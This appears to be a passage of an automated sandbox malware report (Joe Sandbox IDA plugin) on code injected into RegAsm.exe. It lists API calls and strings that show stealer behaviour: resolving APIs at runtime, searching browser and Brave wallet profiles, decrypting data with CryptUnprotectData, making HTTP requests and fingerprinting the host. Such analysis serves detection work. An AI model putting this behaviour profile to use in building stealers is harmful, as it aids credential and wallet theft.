Associated: 00000000.00000002.1828508605.0000000000FFE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000100A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828525742.000000000103D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1828570076.0000000001041000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_file.jbxd

Yara matches

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID: ios_base::badbit set
API String ID: 593203224-3882152299
Opcode ID: 9ea3d886bf31121c19d300bdbade82c5d951f0ce7a4d3610b5c5bafa68c1097e
Instruction ID: b6353bfea1adfcbc166958944a64b8eb6b261f89b5f7124658d94ffa60223dd2
Opcode Fuzzy Hash: 9ea3d886bf31121c19d300bdbade82c5d951f0ce7a4d3610b5c5bafa68c1097e
Instruction Fuzzy Hash: 39E08C31918215CFC334EF18D941B92B3E9EB60320F14092FF0C1C3290EBB85980DB42

Analysis Process: RegAsm.exePID: 3872, Parent PID: 5572COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	0.7%
Signature Coverage:	4.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	33

Executed Functions

Function 004189AF Relevance: 207.0, APIs: 114, Strings: 4, Instructions: 490
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(74DD0000,00417DAF), ref: 004189C3
GetProcAddress.KERNEL32 ref: 004189DA
GetProcAddress.KERNEL32 ref: 004189F1
GetProcAddress.KERNEL32 ref: 00418A08
GetProcAddress.KERNEL32 ref: 00418A1F
GetProcAddress.KERNEL32 ref: 00418A36
GetProcAddress.KERNEL32 ref: 00418A4D
GetProcAddress.KERNEL32 ref: 00418A64
GetProcAddress.KERNEL32 ref: 00418A7B
GetProcAddress.KERNEL32 ref: 00418A92
GetProcAddress.KERNEL32 ref: 00418AA9
GetProcAddress.KERNEL32 ref: 00418AC0
GetProcAddress.KERNEL32 ref: 00418AD7
GetProcAddress.KERNEL32 ref: 00418AEE
GetProcAddress.KERNEL32 ref: 00418B05
GetProcAddress.KERNEL32 ref: 00418B1C
GetProcAddress.KERNEL32 ref: 00418B33
GetProcAddress.KERNEL32 ref: 00418B4A
GetProcAddress.KERNEL32 ref: 00418B61
GetProcAddress.KERNEL32 ref: 00418B78
GetProcAddress.KERNEL32 ref: 00418B8F
GetProcAddress.KERNEL32 ref: 00418BA6
GetProcAddress.KERNEL32 ref: 00418BBD
GetProcAddress.KERNEL32 ref: 00418BD4
GetProcAddress.KERNEL32 ref: 00418BEB
GetProcAddress.KERNEL32 ref: 00418C02
GetProcAddress.KERNEL32 ref: 00418C19
GetProcAddress.KERNEL32 ref: 00418C30
GetProcAddress.KERNEL32 ref: 00418C47
GetProcAddress.KERNEL32 ref: 00418C5E
GetProcAddress.KERNEL32 ref: 00418C75
GetProcAddress.KERNEL32 ref: 00418C8C
GetProcAddress.KERNEL32 ref: 00418CA3
GetProcAddress.KERNEL32 ref: 00418CBA
GetProcAddress.KERNEL32 ref: 00418CD1
GetProcAddress.KERNEL32 ref: 00418CE8
GetProcAddress.KERNEL32 ref: 00418CFF
GetProcAddress.KERNEL32 ref: 00418D16
GetProcAddress.KERNEL32 ref: 00418D2D
GetProcAddress.KERNEL32 ref: 00418D44
GetProcAddress.KERNEL32 ref: 00418D5B
GetProcAddress.KERNEL32 ref: 00418D72
GetProcAddress.KERNEL32 ref: 00418D89
LoadLibraryA.KERNEL32(00417DAF,?,00000034,00000032,004142D6,0041246C,?,00000040,00000064,0041428D,00413935,?,0000002C,00000064,0041420C,00414249), ref: 00418D9A
LoadLibraryA.KERNEL32 ref: 00418DAB
LoadLibraryA.KERNEL32 ref: 00418DBC
LoadLibraryA.KERNEL32 ref: 00418DCD
LoadLibraryA.KERNEL32 ref: 00418DDE
LoadLibraryA.KERNEL32 ref: 00418DEF
LoadLibraryA.KERNEL32 ref: 00418E00
LoadLibraryA.KERNEL32 ref: 00418E11
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418E21
GetProcAddress.KERNEL32(75290000), ref: 00418E3C
GetProcAddress.KERNEL32 ref: 00418E53
GetProcAddress.KERNEL32 ref: 00418E6A
GetProcAddress.KERNEL32 ref: 00418E81
GetProcAddress.KERNEL32 ref: 00418E98
GetProcAddress.KERNEL32(734C0000), ref: 00418EB7
GetProcAddress.KERNEL32 ref: 00418ECE
GetProcAddress.KERNEL32 ref: 00418EE5
GetProcAddress.KERNEL32 ref: 00418EFC
GetProcAddress.KERNEL32 ref: 00418F13
GetProcAddress.KERNEL32 ref: 00418F2A
GetProcAddress.KERNEL32 ref: 00418F41
GetProcAddress.KERNEL32 ref: 00418F58
GetProcAddress.KERNEL32(752C0000), ref: 00418F73
GetProcAddress.KERNEL32 ref: 00418F8A
GetProcAddress.KERNEL32 ref: 00418FA1
GetProcAddress.KERNEL32 ref: 00418FB8
GetProcAddress.KERNEL32 ref: 00418FCF
GetProcAddress.KERNEL32(74EC0000), ref: 00418FEE
GetProcAddress.KERNEL32 ref: 00419005
GetProcAddress.KERNEL32 ref: 0041901C
GetProcAddress.KERNEL32 ref: 00419033
GetProcAddress.KERNEL32 ref: 0041904A
GetProcAddress.KERNEL32 ref: 00419061
GetProcAddress.KERNEL32(75BD0000), ref: 00419080
GetProcAddress.KERNEL32 ref: 00419097
GetProcAddress.KERNEL32 ref: 004190AE
GetProcAddress.KERNEL32 ref: 004190C5
GetProcAddress.KERNEL32 ref: 004190DC
GetProcAddress.KERNEL32 ref: 004190F3
GetProcAddress.KERNEL32 ref: 0041910A
GetProcAddress.KERNEL32 ref: 00419121
GetProcAddress.KERNEL32 ref: 00419138
GetProcAddress.KERNEL32(75A70000), ref: 00419153
GetProcAddress.KERNEL32 ref: 0041916A
GetProcAddress.KERNEL32 ref: 00419181
GetProcAddress.KERNEL32 ref: 00419198
GetProcAddress.KERNEL32 ref: 004191AF
GetProcAddress.KERNEL32(75450000), ref: 004191CA
GetProcAddress.KERNEL32 ref: 004191E1
GetProcAddress.KERNEL32(75DA0000), ref: 004191FC
GetProcAddress.KERNEL32 ref: 00419213
GetProcAddress.KERNEL32(6F090000), ref: 00419232
GetProcAddress.KERNEL32 ref: 00419249
GetProcAddress.KERNEL32 ref: 00419260
GetProcAddress.KERNEL32 ref: 00419277
GetProcAddress.KERNEL32 ref: 0041928E
GetProcAddress.KERNEL32 ref: 004192A5
GetProcAddress.KERNEL32 ref: 004192BC
GetProcAddress.KERNEL32 ref: 004192D3
GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 004192E9
GetProcAddress.KERNEL32(InternetSetOptionA), ref: 004192FF
GetProcAddress.KERNEL32(75AF0000), ref: 0041931A
GetProcAddress.KERNEL32 ref: 00419331
GetProcAddress.KERNEL32 ref: 00419348
GetProcAddress.KERNEL32 ref: 0041935F
GetProcAddress.KERNEL32(75D90000), ref: 0041937A
GetProcAddress.KERNEL32(6C9A0000), ref: 00419395
GetProcAddress.KERNEL32 ref: 004193AC
GetProcAddress.KERNEL32 ref: 004193C3
GetProcAddress.KERNEL32 ref: 004193DA
GetProcAddress.KERNEL32(6C810000,SymMatchString), ref: 004193F4

Strings

HttpQueryInfoA, xrefs: 004192D9
dbghelp.dll, xrefs: 00418E17
SymMatchString, xrefs: 004193EE
InternetSetOptionA, xrefs: 004192EF

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
API String ID: 2238633743-951535364
Opcode ID: a7a31017a92ac445d77c019c23fb22a50d0f9906b769c18f2d4ca5e99c2f16bf
Instruction ID: 65ebf709cdf07e9b9bdf68de7ce64cc50a64c0a1838b99d54e2364bdeb788558
Opcode Fuzzy Hash: a7a31017a92ac445d77c019c23fb22a50d0f9906b769c18f2d4ca5e99c2f16bf
Instruction Fuzzy Hash: 9942EB7D480281EFEB525FA1FD589653BB7F70BB413007126EA058A630DB3249E9EF51

Function 0040D1BA Relevance: 44.7, APIs: 19, Strings: 6, Instructions: 924
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 0040D1BF

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
Part of subcall function 00410745: lstrcpy.KERNEL32(00000000), ref: 00410799
Part of subcall function 00410745: lstrcat.KERNEL32(?,?), ref: 004107A4

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

FindFirstFileA.KERNEL32(00000000,?,00426C57,00426C56,00000000,?,00426DA4,?,?,00426C47,?,?,00000000), ref: 0040D260
StrCmpCA.SHLWAPI(?,00426DA8,?,?,00000000), ref: 0040D2C7
StrCmpCA.SHLWAPI(?,00426DAC,?,?,00000000), ref: 0040D2E1
StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00426DB0,?,?,00426C5A,?,?,00000000), ref: 0040D392

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Brave, xrefs: 0040D584
\BraveWallet\Preferences, xrefs: 0040D6D5
H, xrefs: 0040DE8D
Preferences, xrefs: 0040D5A3
Opera GX, xrefs: 0040D381
Google Chrome, xrefs: 0040DB68

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
API String ID: 3869166975-1816240570
Opcode ID: 0337d3ea5316b6b56c9b5a64cf224c38c88f78dd9e0fab9b1b74c0c9d52f90fd
Instruction ID: af6a4c34fdae377bdaa86fad299786cb3a61c0b5191637667fd87def09c7682d
Opcode Fuzzy Hash: 0337d3ea5316b6b56c9b5a64cf224c38c88f78dd9e0fab9b1b74c0c9d52f90fd
Instruction Fuzzy Hash: 89827570D0028CEADF15EBB5C955BDD7BB86F15304F50409EE449A3282DBB81BC8DBA6

Function 004041B2 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 170
networkmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_EH_prolog.MSVCRT ref: 004041B7

Part of subcall function 00410603: lstrcpy.KERNEL32(00000000,r~A), ref: 00410629

Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041FE
RtlAllocateHeap.NTDLL(00000000), ref: 00404205
InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404224
StrCmpCA.SHLWAPI(?), ref: 00404238
InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040425C
HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404292
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004042B6
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004042C1
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004042DF
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404337
InternetCloseHandle.WININET(00000000), ref: 00404369
InternetCloseHandle.WININET(?), ref: 00404372
InternetCloseHandle.WININET(?), ref: 0040437B

Strings

GET, xrefs: 0040428A

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 1687531150-1805413626
Opcode ID: 9d7a796367f8dc91b7a56bd4ecf66bb65fd7ae7936c2cee210b19609f14445e8
Instruction ID: 0798ec0892bb89456e12c70f8d40c1149d4f92355c28b1e5a1999e8c1d3e8f5d
Opcode Fuzzy Hash: 9d7a796367f8dc91b7a56bd4ecf66bb65fd7ae7936c2cee210b19609f14445e8
Instruction Fuzzy Hash: F9517FB2900119EFDB10EFE0DD85AEFBBB9EB49344F00012AFA11B6190D7784E85CB65

Function 1B3E4CF0 Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 461
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,-00000003,04000102,00000000), ref: 1B3E4EE1

Strings

exclusive, xrefs: 1B3E4E81
psow, xrefs: 1B3E51F5
winOpen, xrefs: 1B3E5110
delayed %dms for lock/sharing conflict at line %d, xrefs: 1B3E4FB5

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 8c0f328c5cb4618071dc602cc573fca393d7e3a26dc43c010495db35dfd84cb7
Instruction ID: e2a948daa78e519b51bbdcd5554dbf26e615f4e8c1039ac5da02e25de924cf87
Opcode Fuzzy Hash: 8c0f328c5cb4618071dc602cc573fca393d7e3a26dc43c010495db35dfd84cb7
Instruction Fuzzy Hash: 48F1B4B19043218FDB14CF24C985B9E77E8FB98715F410A2FF985C6281E735D968CBA2

Function 0041136D Relevance: 9.1, APIs: 6, Instructions: 67commemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00411372
CoCreateInstance.OLE32(00427E30,00000000,00000001,00427510,?,00000001,00000000,00000000,00000001,?,00000000), ref: 00411399
SysAllocString.OLEAUT32(?), ref: 004113A6
_wtoi64.MSVCRT ref: 004113E1
SysFreeString.OLEAUT32(?), ref: 004113F4
SysFreeString.OLEAUT32(00000000), ref: 004113FB

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: String$Free$AllocCreateH_prologInstance_wtoi64
String ID:
API String ID: 1816492551-0
Opcode ID: 5d4ec6d156a86e84fe0025b1974bb269fdc0c4ddf21a9b0c19e415bd599e76e5
Instruction ID: 1e5b3d4cf7e4c1b530ec02fd3258b84a0804f3dc718d7f6574fd4ec72ff840b6
Opcode Fuzzy Hash: 5d4ec6d156a86e84fe0025b1974bb269fdc0c4ddf21a9b0c19e415bd599e76e5
Instruction Fuzzy Hash: 1621A2B1A00219AFCB00DFA5D9899EEBBB9FF44305B10447EF506E7211C7354E42CB65

Function 00410F6C Relevance: 7.6, APIs: 5, Instructions: 70processCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410F71

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410FAC
Process32First.KERNEL32(00000000,00000128), ref: 00410FBD
Process32Next.KERNEL32(?,00000128), ref: 00411025
CloseHandle.KERNEL32(?,?,00000000), ref: 00411032

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prologHandleNextSnapshotToolhelp32lstrcpy
String ID:
API String ID: 599723951-0
Opcode ID: e40a058f78a9919fa36ec46aabbffad4bd54f0197d51d69064c97523b178062c
Instruction ID: 218176ec469042c1a0fe680f4eb32a9427885ec623821c50525c207c1c2a06eb
Opcode Fuzzy Hash: e40a058f78a9919fa36ec46aabbffad4bd54f0197d51d69064c97523b178062c
Instruction Fuzzy Hash: 81213071A01258ABCB10DFA5C949AEEFBB9AF88344F00406FE505E3251DB784A84DB65

Function 0041093B Relevance: 6.0, APIs: 4, Instructions: 29memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,Computer Name: ,00000000,?,004277E0,00000000,?,00000000,00000000,?,AV: ), ref: 0041094C
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277E0,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410953
GetTimeZoneInformation.KERNEL32(00000000,?,00000000,00000000,?,Computer Name: ,00000000,?,004277E0,00000000,?,00000000,00000000,?,AV: ,00000000), ref: 00410962
wsprintfA.USER32 ref: 00410980

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: da5f75b57f23892a76f226f3b6371d936a0ea235767a1ab2725f8df9272c6611
Instruction ID: 7db8942824dbe684cc3b5a5255f33886bb7fe65407491f054089249fd17f6081
Opcode Fuzzy Hash: da5f75b57f23892a76f226f3b6371d936a0ea235767a1ab2725f8df9272c6611
Instruction Fuzzy Hash: 6EE022B5701224BBEB2067A8AC0EF863A6D9B03320F000262FB55D61D0E6B499808AA1

Function 00406DE2 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00406E05
LocalAlloc.KERNEL32(00000040,?,?), ref: 00406E1D
LocalFree.KERNEL32(?), ref: 00406E3B

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: 24216523a6a1eba3427dd92b2d04ae92233e0603f49f29e937921ffb41575936
Instruction ID: eebe1908d0925e3707d17d30b86a2b3a1e649d8d23c78179c4f72859e7bd7a11
Opcode Fuzzy Hash: 24216523a6a1eba3427dd92b2d04ae92233e0603f49f29e937921ffb41575936
Instruction Fuzzy Hash: 0F011DBA900218AFCB10DFA9DC898EEBBB9EF49600B10486AF915E7250D6759990CB50

Function 00410874 Relevance: 4.5, APIs: 3, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004185DE,00427727), ref: 00410880
HeapAlloc.KERNEL32(00000000,?,?,?,004185DE,00427727), ref: 00410887
GetUserNameA.ADVAPI32(00000000,?), ref: 0041089B

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 1d253da07de5c7afa3ef09fd19d4ea49929b4c561f152116a57d4009734f8b47
Instruction ID: 3c7215dbc88e4dafb30cb29d2a05768295cf581f3ed51de935c7e1c1c11d0bd3
Opcode Fuzzy Hash: 1d253da07de5c7afa3ef09fd19d4ea49929b4c561f152116a57d4009734f8b47
Instruction Fuzzy Hash: ABD05EB6700204BBD7109FA5DD0DE9ABAFCEB84756F400065FB02D2294DAF49A018A34

Function 00410B2A Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00000000), ref: 00410B37
wsprintfA.USER32 ref: 00410B4C

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

